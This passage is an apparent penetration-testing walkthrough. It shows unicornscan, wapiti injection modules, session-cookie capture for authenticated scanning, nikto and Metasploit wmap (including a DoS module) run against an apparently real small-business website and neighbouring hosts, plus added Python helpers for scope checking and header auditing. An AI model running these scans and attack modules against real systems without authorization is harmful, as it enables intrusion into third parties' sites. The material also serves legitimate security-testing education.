  1179. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 5435 and we have 1550
  1180. connected 192.168.1.83:5563 -> 198.71.232.7:22
  1181. TCP open 198.71.232.7:22 ttl 47
  1182. connected 192.168.1.83:7734 -> 198.71.232.1:25
  1183. TCP open 198.71.232.1:25 ttl 47
  1184. connected 192.168.1.83:43683 -> 198.71.232.0:25
  1185. TCP open 198.71.232.0:25 ttl 47
  1186. connected 192.168.1.83:30502 -> 198.71.232.2:25
  1187. TCP open 198.71.232.2:25 ttl 47
  1188. sender statistics 290.9 pps with 86528 packets sent total
  1189. listener statistics 180 packets recieved 0 packets droped and 0 interface drops
  1190. TCP open smtp[ 25] from 198.71.232.0 ttl 47
  1191. TCP open smtp[ 25] from 198.71.232.1 ttl 47
  1192. TCP open smtp[ 25] from 198.71.232.2 ttl 47
  1193. TCP open https[ 443] from 198.71.232.3 ttl 47
  1194. TCP open http[ 80] from 198.71.232.4 ttl 47
  1195. TCP open https[ 443] from 198.71.232.4 ttl 47
  1196. TCP open https[ 443] from 198.71.232.5 ttl 110
  1197. TCP open http[ 80] from 198.71.232.6 ttl 47
  1198. TCP open https[ 443] from 198.71.232.6 ttl 47
  1199. TCP open ssh[ 22] from 198.71.232.7 ttl 47
  1200. TCP open http[ 80] from 198.71.232.7 ttl 47
  1201. TCP open https[ 443] from 198.71.232.7 ttl 47
  1202.  
  Reading the result: only 198.71.232.3 is the target; .0-.2 (SMTP), .4-.7 (HTTP/HTTPS) and .7 (SSH) are neighbours. 198.71.232.5 answers with ttl 110 while every other host shows 47, which points to a different initial TTL (128 rather than 64) and therefore, most likely, a different operating system family on that box.
  1203.  
  1204. ┌─[✗]─[root@parrot]─[~]
  1205. └──╼ #unicornscan -mU -v -I 198.71.232.3/24
  1206. adding 198.71.232.0/24 mode `UDPscan' ports `7,9,11,13,17,19,20,37,39,42,49,52-54,65-71,81,111,161,123,136-170,514-518,630,631,636-640,650,653,921,1023-1030,1900,2048-2050,27900,27960,32767-32780,32831' pps 300
  1207. using interface(s) eth0
  1208. scaning 2.56e+02 total hosts with 2.66e+04 total packets, should take a little longer than 1 Minutes, 35 Seconds
  1209. UDP open 192.168.1.1:53 ttl 64
  1210.  
  1211. --snip--
  
  That lone hit is not in the target range: 192.168.1.1 (ttl 64) is the scanning host's own LAN gateway, most likely a reply to the scanner's own DNS traffic caught by the listener's pcap filter. Expect few or no UDP positives against a remote host: unicornscan only reports a UDP port as open when the service answers its probe payload, so silence means closed or filtered.
  1212.  
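Added Python example (not unicornscan's own code) that turns the two line formats unicornscan prints above (the immediate "TCP open 198.71.232.3:443 ttl 47" lines and the "TCP open https[ 443] from ... ttl 47" summary) into a per-host table, estimates the initial TTL so that the ttl 110 host stands out, and splits the hosts into in-scope and out-of-scope against an allow-list. The sample lines are constructed from the output above, and the allow-list 198.71.232.3/32 is an assumption for the example.

```python
"""Parse unicornscan open-port lines into a per-host view (added example; not
unicornscan's code) and split hosts by engagement scope."""
import ipaddress
import re
from collections import defaultdict

# Constructed sample in the two formats unicornscan prints above.
SAMPLE = """\
TCP open 198.71.232.3:443 ttl 47
TCP open smtp[ 25] from 198.71.232.0 ttl 47
TCP open https[ 443] from 198.71.232.3 ttl 47
TCP open http[ 80] from 198.71.232.4 ttl 47
TCP open https[ 443] from 198.71.232.4 ttl 47
TCP open https[ 443] from 198.71.232.5 ttl 110
TCP open ssh[ 22] from 198.71.232.7 ttl 47
TCP open http[ 80] from 198.71.232.7 ttl 47
TCP open https[ 443] from 198.71.232.7 ttl 47
UDP open 192.168.1.1:53 ttl 64
"""

# "TCP open https[ 443] from 198.71.232.3 ttl 47"  (end-of-scan summary)
SUMMARY_RE = re.compile(r"^(TCP|UDP) open (\w+)\[\s*(\d+)\] from (\S+) ttl (\d+)")
# "TCP open 198.71.232.3:443 ttl 47"               (-I immediate output)
IMMEDIATE_RE = re.compile(r"^(TCP|UDP) open ([\d.]+):(\d+) ttl (\d+)")


def parse_open_ports(text):
    """Return {ip: {"ports": {(proto, port): service_or_None}, "ttl": n}}.
    A port seen in both formats is recorded once, keeping the service name."""
    hosts = defaultdict(lambda: {"ports": {}, "ttl": None})
    for line in text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:
            proto, svc, port, ip, ttl = m.groups()
        else:
            m = IMMEDIATE_RE.match(line)
            if not m:
                continue
            proto, ip, port, ttl = m.groups()
            svc = None
        entry = hosts[ip]
        key = (proto.lower(), int(port))
        entry["ports"][key] = svc or entry["ports"].get(key)
        entry["ttl"] = int(ttl)
    return dict(hosts)


def guess_initial_ttl(ttl):
    """Round an observed TTL up to the nearest common initial value and return
    (initial, hops). Only a hint: 64 is typical of Linux/BSD, 128 of Windows,
    and load balancers or proxies rewrite TTLs."""
    for initial in (64, 128, 255):
        if ttl <= initial:
            return initial, initial - ttl
    return None, None


def split_scope(hosts, allowed_cidrs):
    """Separate parsed hosts into (in_scope, out_of_scope) by an allow-list of
    CIDRs. Anything out of scope must not be probed further."""
    nets = [ipaddress.ip_network(c, strict=False) for c in allowed_cidrs]
    inside, outside = {}, {}
    for ip, entry in hosts.items():
        addr = ipaddress.ip_address(ip)
        (inside if any(addr in n for n in nets) else outside)[ip] = entry
    return inside, outside


if __name__ == "__main__":
    hosts = parse_open_ports(SAMPLE)
    inside, outside = split_scope(hosts, ["198.71.232.3/32"])   # assumed scope
    for label, group in (("in scope", inside), ("OUT OF SCOPE", outside)):
        for ip, entry in sorted(group.items()):
            initial, hops = guess_initial_ttl(entry["ttl"])
            ports = ", ".join(f"{p}/{proto}" for (proto, p) in sorted(entry["ports"]))
            print(f"{label:12} {ip:15} ttl {entry['ttl']} (~{initial}, {hops} hops) {ports}")
```

Feeding it the saved output of a /24 sweep gives a quick answer to the two questions that matter before the next step: which of these hosts am I actually allowed to touch, and does any host's TTL suggest a different platform from the rest.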
  1213. CHECK THE SITE WITH WAPITI
  1214.  
  1215. ┌─[root@parrot]─[~]
  1216. └──╼ #wapiti http://www.vyxunbnbs.com/ -n 10 -b folder -u -v 1 -f html -o /tmp/scan_report
  1217. Wapiti-2.3.0 (wapiti.sourceforge.net)
  1218.  
  1219. [*] Loading modules:
  1220. mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto
  1221.  
  1222. [+] Launching module exec
  1223. + attackGET http://www.vyxunbnbs.com/
  1224. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1225. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1226. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1227. + attackGET http://www.vyxunbnbs.com/home.html
  1228. + attackGET http://www.vyxunbnbs.com/contact.html
  1229. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1230. + attackGET http://www.vyxunbnbs.com/products.html
  1231. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1232. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1233. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1234. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1235. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1236. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1237. + attackGET http://www.vyxunbnbs.com/random-items.html
  1238. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1239. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1240. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1241. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1242. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1243. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1244. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1245. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1246. + attackGET http://www.vyxunbnbs.com/Loading...
  1247. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1248. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1249. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1250.  
  1251. [+] Launching module file
  1252. + attackGET http://www.vyxunbnbs.com/
  1253. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1254. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1255. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1256. + attackGET http://www.vyxunbnbs.com/home.html
  1257. + attackGET http://www.vyxunbnbs.com/contact.html
  1258. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1259. + attackGET http://www.vyxunbnbs.com/products.html
  1260. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1261. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1262. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1263. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1264. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1265. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1266. + attackGET http://www.vyxunbnbs.com/random-items.html
  1267. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1268. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1269. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1270. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1271. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1272. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1273. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1274. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1275. + attackGET http://www.vyxunbnbs.com/Loading...
  1276. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1277. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1278. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1279.  
  1280. [+] Launching module sql
  1281. + attackGET http://www.vyxunbnbs.com/
  1282. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1283. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1284. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1285. + attackGET http://www.vyxunbnbs.com/home.html
  1286. + attackGET http://www.vyxunbnbs.com/contact.html
  1287. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1288. + attackGET http://www.vyxunbnbs.com/products.html
  1289. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1290. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1291. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1292. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1293. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1294. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1295. + attackGET http://www.vyxunbnbs.com/random-items.html
  1296. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1297. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1298. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1299. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1300. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1301. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1302. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1303. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1304. + attackGET http://www.vyxunbnbs.com/Loading...
  1305. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1306. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1307. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1308.  
  1309. [+] Launching module xss
  1310. + attackGET http://www.vyxunbnbs.com/
  1311. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1312. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1313. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1314. + attackGET http://www.vyxunbnbs.com/home.html
  1315. + attackGET http://www.vyxunbnbs.com/contact.html
  1316. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1317. + attackGET http://www.vyxunbnbs.com/products.html
  1318. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1319. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1320. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1321. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1322. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1323. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1324. + attackGET http://www.vyxunbnbs.com/random-items.html
  1325. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1326. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1327. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1328. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1329. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1330. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1331. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1332. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1333. + attackGET http://www.vyxunbnbs.com/Loading...
  1334. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1335. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1336. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1337.  
  1338. [+] Launching module blindsql
  1339. + attackGET http://www.vyxunbnbs.com/
  1340. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1341. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1342. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
+ attackGET http://www.vyxunbnbs.com/home.html
+ attackGET http://www.vyxunbnbs.com/contact.html
+ attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
+ attackGET http://www.vyxunbnbs.com/products.html
+ attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
+ attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
+ attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
+ attackGET http://www.vyxunbnbs.com/bone-art.html
+ attackGET http://www.vyxunbnbs.com/leather-crafting.html
+ attackGET http://www.vyxunbnbs.com/wooden-items.html
+ attackGET http://www.vyxunbnbs.com/random-items.html
+ attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
+ attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
+ attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
+ attackGET http://www.vyxunbnbs.com/.view-as-mobile
+ attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
+ attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
+ attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
+ attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
+ attackGET http://www.vyxunbnbs.com/Loading...
+ attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
+ attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
+ attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper

[+] Launching module permanentxss
+ http://www.vyxunbnbs.com/
+ http://www.vyxunbnbs.com/site.css?v=
+ http://www.vyxunbnbs.com/common/wsb/core
+ http://www.vyxunbnbs.com/libs/knockout/knockout
+ http://www.vyxunbnbs.com/home.html
+ http://www.vyxunbnbs.com/contact.html
+ http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
+ http://www.vyxunbnbs.com/products.html
+ http://www.vyxunbnbs.com/bullet-jewellery.html
+ http://www.vyxunbnbs.com/boar-tusk-necklaces.html
+ http://www.vyxunbnbs.com/decorated-skulls-.html
+ http://www.vyxunbnbs.com/bone-art.html
+ http://www.vyxunbnbs.com/leather-crafting.html
+ http://www.vyxunbnbs.com/wooden-items.html
+ http://www.vyxunbnbs.com/random-items.html
+ http://www.vyxunbnbs.com/WSB.ForceDesktop
+ http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
+ http://www.vyxunbnbs.com/designer/iebackground/iebackground
+ http://www.vyxunbnbs.com/.view-as-mobile
+ http://www.vyxunbnbs.com/.wsb-canvas-page-container
+ http://www.vyxunbnbs.com/vyxunbnbs.com
+ http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
+ http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
+ http://www.vyxunbnbs.com/Loading...
+ http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
+ http://www.vyxunbnbs.com/plugins/twitter/index.php
+ http://www.vyxunbnbs.com/designer/util/facebookSDKHelper

Report
------
A report has been generated in the file /tmp/scan_report
Open /tmp/scan_report/index.html with a browser to see this report.

┌─[root@parrot]─[~]
└──╼ #firefox /tmp/scan_report/index.html


...........................
Note
========
This scan has been saved in the file /root/.wapiti/scans/www.vyxunbnbs.com.xml
You can use it to perform attacks without scanning again the web site with the "-k" parameter


NOTE

Wapiti works better when you give it the session cookie value.

To get the cookie, use the getcookie.py script that ships with Powerfuzzer.

Usage: python getcookie.py <cookie_file> <url_with_form>

It will dump the cookie to the file. After getting the cookie, set Powerfuzzer to use it (Cookie button in the GUI).

Cookies are saved in LWP format (LWPCookieJar):

#LWP-Cookies-2.0
Set-Cookie3: SID=a0b498e88f488dd8a48baf6778da85b9; path="/"; domain="test.com"; path_spec; discard; version=0


┌─[✗]─[root@parrot]─[/usr/share/powerfuzzer]
└──╼ #./getcookie.py ~/cookie.txt http://www.vyxunbnbs.com/webapp/login.php

Enter username/password etc. as required to complete the login form.

When the script exits, check the contents of ~/cookie.txt; it will look something like:

#LWP-Cookies-2.0

Set-Cookie3: PHPSESSID=3d20841af5de43c718732d80e5d78fe3; path="/"; domain="orange"; path_spec; expires="2010-01-04 22:42:47Z"; version=0

Now we can use wapiti to test any URLs 'behind' the login screen (as it were):

wapiti http://www.vyxunbnbs.com/webapp/search.php --cookie ~/cookie.txt -v 2 -o ~/report -x http://www.vyxunbnbs.com/webapp/logout.php

(We need to exclude the logout page, else our session will get destroyed when wapiti spiders that page...)
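Whether the scanner actually sends the dumped cookie depends on the lifetime and transport attributes in that LWP file. The following added example (not part of the original paste, nor code from Powerfuzzer or wapiti) loads a constructed LWP-Cookies-2.0 file with Python's standard http.cookiejar.LWPCookieJar and shows which cookies the jar keeps and which it would attach to a request; the cookie names, values and the test.com domain are made up.

```python
import os
import tempfile
import urllib.request
from http.cookiejar import LWPCookieJar

# Constructed LWP-Cookies-2.0 file in the same shape getcookie.py writes.
# The three cookies differ only in their lifetime/transport attributes:
#   SID        session cookie ("discard", no expires)
#   PHPSESSID  has an expires date in the past
#   AUTH       long-lived and marked "secure"
SAMPLE_COOKIE_FILE = """#LWP-Cookies-2.0
Set-Cookie3: SID=sessionvalue1; path="/"; domain="test.com"; path_spec; discard; version=0
Set-Cookie3: PHPSESSID=oldvalue2; path="/webapp"; domain="test.com"; path_spec; expires="2010-01-04 22:42:47Z"; version=0
Set-Cookie3: AUTH=longlived3; path="/"; domain="test.com"; path_spec; secure; expires="2099-01-01 00:00:00Z"; version=0
"""


def load_lwp_cookies(text, keep_all=False):
    """Parse LWP cookie text into an LWPCookieJar.

    With keep_all=False the jar applies its defaults and silently drops
    session cookies ("discard") and cookies whose expires date has passed,
    which is what makes a stale getcookie.py dump useless for a scan.
    """
    jar = LWPCookieJar()
    # LWPCookieJar.load wants a file name, so write the text to a temp file.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(text)
        path = fh.name
    try:
        jar.load(path, ignore_discard=keep_all, ignore_expires=keep_all)
    finally:
        os.unlink(path)
    return jar


def cookies_kept(text, keep_all=False):
    """Names of the cookies the jar keeps after loading."""
    return sorted(c.name for c in load_lwp_cookies(text, keep_all))


def cookies_sent_to(jar, url):
    """Names of the cookies the jar puts in the Cookie header for url.

    Domain and path must match, expired cookies are never sent, and
    "secure" cookies are only sent over https.
    """
    request = urllib.request.Request(url)
    jar.add_cookie_header(request)
    header = request.get_header("Cookie")
    if not header:
        return []
    return sorted(part.split("=", 1)[0].strip() for part in header.split(";"))


def describe(text):
    """Per-cookie summary: session-only, already expired, secure-only."""
    jar = load_lwp_cookies(text, keep_all=True)
    return {
        c.name: {
            "session": bool(c.discard),
            "expired": c.is_expired(),
            "secure": bool(c.secure),
        }
        for c in jar
    }


if __name__ == "__main__":
    print("kept with defaults:", cookies_kept(SAMPLE_COOKIE_FILE))
    print("kept with ignore flags:", cookies_kept(SAMPLE_COOKIE_FILE, keep_all=True))
    jar = load_lwp_cookies(SAMPLE_COOKIE_FILE, keep_all=True)
    for url in ("http://test.com/webapp/search.php", "https://test.com/webapp/search.php"):
        print(url, "->", cookies_sent_to(jar, url))
```

If the dump only contains an expired or session cookie, re-run getcookie.py right before the scan rather than reusing an old file.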


USE BLINDELEPHANT

https://media.blackhat.com/bh-us-10/presentations/Thomas/BlackHat-USA-2010-Thomas-BlindElephant-WebApp-Fingerprinting-slides.pdf

BlindElephant.py http://www.somesite.com appName

BlindElephant.py http://forum.somesite.com phpbb

┌─[root@parrot]─[~]
└──╼ #BlindElephant.py www.vyxunbnbs.com movabletype
Loaded /usr/lib/pymodules/python2.7/blindelephant/dbs/movabletype.pkl with 101 versions, 2229 differentiating paths, and 216 version groups.
Starting BlindElephant fingerprint for version of movabletype at http://www.vyxunbnbs.com

Hit http://www.vyxunbnbs.com/mt-static/mt.js
File produced no match. Error: Failed to reach a server: timed out

Hit http://www.vyxunbnbs.com/mt-static/js/tc/client.js
File produced no match. Error: Failed to reach a server: timed out


Error: All versions ruled out!


CHECK THE SITE WITH NIKTO

┌─[root@parrot]─[~]
└──╼ #nikto -h 198.71.232.3
- Nikto v2.1.6
---------------------------------------------------------------------------
+ No web server found on 198.71.232.3:80
---------------------------------------------------------------------------
+ 0 host(s) tested

┌─[root@parrot]─[~]
└──╼ #nikto -h 198.71.232.3 -p 443
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          198.71.232.3
+ Target Hostname:    198.71.232.3
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, LLC/CN=*.godaddysites.com
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certificates.godaddy.com/repository/CN=Go Daddy Secure Certification Authority/serialNumber=07969287
+ Start Time:         2016-05-29 17:25:53 (GMT2)
---------------------------------------------------------------------------
+ Server: DPS/1.0.3
+ Cookie dps_site_id created without the secure flag
+ Cookie dps_site_id created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-siteid' found, with contents: 2000
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server is using a wildcard certificate: *.godaddysites.com
+ Hostname '198.71.232.3' does not match certificate's names: *.godaddysites.com
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 18 error(s) and 9 item(s) reported on remote host
+ End Time:           2016-05-29 18:04:21 (GMT2) (2308 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

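Every nikto finding in that run is a header-level check, so the same audit can be reproduced offline and used to verify a fix before rescanning. The following added example (not part of the paste, and not nikto's code) runs those checks over a constructed HTTPS response modelled on the scan output beside a hardened version of it; the cookie value and the hardened header values are assumptions.

```python
import re
from email.parser import Parser

# Constructed response headers modelled on the nikto findings above:
# version-bearing Server banner, dps_site_id cookie without flags,
# unusual x-siteid header and none of the hardening headers.
WEAK_RESPONSE = """Server: DPS/1.0.3
Content-Type: text/html
Set-Cookie: dps_site_id=EXAMPLE_VALUE; path=/
x-siteid: 2000
"""

# The same response with the headers nikto asked for (assumed values).
# nikto also flags X-XSS-Protection; modern browsers ignore that header,
# so it is deliberately not part of this audit.
HARDENED_RESPONSE = """Server: DPS
Content-Type: text/html
Set-Cookie: dps_site_id=EXAMPLE_VALUE; path=/; Secure; HttpOnly; SameSite=Lax
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'
x-siteid: 2000
"""


def parse_headers(raw):
    """Parse a raw header block; repeated headers (Set-Cookie) are preserved."""
    return Parser().parsestr(raw, headersonly=True)


def cookie_findings(set_cookie_value):
    """Report missing transport/scope attributes on one Set-Cookie header."""
    name = set_cookie_value.split("=", 1)[0].strip()
    attrs = {
        a.strip().split("=", 1)[0].lower()
        for a in set_cookie_value.split(";")[1:]
    }
    findings = []
    if "secure" not in attrs:
        findings.append(f"Cookie {name} created without the secure flag")
    if "httponly" not in attrs:
        findings.append(f"Cookie {name} created without the httponly flag")
    if "samesite" not in attrs:
        findings.append(f"Cookie {name} has no SameSite attribute")
    return findings


def audit_response(raw, over_tls=True):
    """Return the list of findings for a raw response header block."""
    msg = parse_headers(raw)
    findings = []
    for value in msg.get_all("Set-Cookie", []):
        findings.extend(cookie_findings(value))
    csp = msg.get("Content-Security-Policy", "")
    if msg.get("X-Frame-Options") is None and "frame-ancestors" not in csp:
        findings.append("The anti-clickjacking X-Frame-Options header is not present "
                        "(and CSP sets no frame-ancestors)")
    if over_tls and msg.get("Strict-Transport-Security") is None:
        findings.append("The site uses SSL and the Strict-Transport-Security header is not defined")
    if (msg.get("X-Content-Type-Options") or "").strip().lower() != "nosniff":
        findings.append("The X-Content-Type-Options header is not set to nosniff")
    server = msg.get("Server", "")
    if re.search(r"\d", server):
        findings.append(f"Server header discloses a version: {server}")
    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"[{label}]")
        for finding in audit_response(raw):
            print("  +", finding)
```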

USE METASPLOIT

executing "msfstart"

Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
┌─[root@parrot]─[~]
└──╼ #msfconsole

(msfconsole ASCII-art banner omitted)

http://metasploit.pro


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

CONNECT TO THE POSTGRES DB

msf > db_connect root:toor
[-] postgresql already connected to msf
[-] Run db_disconnect first if you wish to connect to a different database
msf >


CHECK DB STATUS

msf > db_status
[*] postgresql connected to msf


USE WMAP

msf > load wmap

(wmap ASCII-art banner omitted)
[WMAP 1.5.1] === et [ ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf >

ADD THE SITE

msf > wmap_sites -a http://www.vyxunbnbs.com

msf > wmap_sites -l

ADD THE TARGET

msf > wmap_targets -t http://198.71.232.3
msf > wmap_targets -l
[*] Defined targets
===============

   Id  Vhost         Host          Port  SSL    Path
   --  -----         ----          ----  ---    ----
   0   198.71.232.3  198.71.232.3  80    false  /

RUN THE TEST

msf > wmap_run -t
[*] Testing target:
[*] Site: 198.71.232.3 (198.71.232.3)
[*] Port: 80 SSL: false
============================================================
[*] Testing started. 2016-05-29 13:37:42 +0200
[*] Loading wmap modules...
[*] 40 wmap enabled modules loaded.
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/scanner/http/robots_txt
[*] Module auxiliary/scanner/http/frontpage_login
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Module auxiliary/scanner/http/options
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[*] Module auxiliary/scanner/http/scraper
[*] Module auxiliary/scanner/http/svn_scanner
[*] Module auxiliary/scanner/http/trace
[*] Module auxiliary/scanner/http/vhost_scanner
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] Module auxiliary/scanner/http/webdav_website_content
[*]
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/dos/http/apache_range_dos
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Module auxiliary/scanner/http/dir_scanner
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
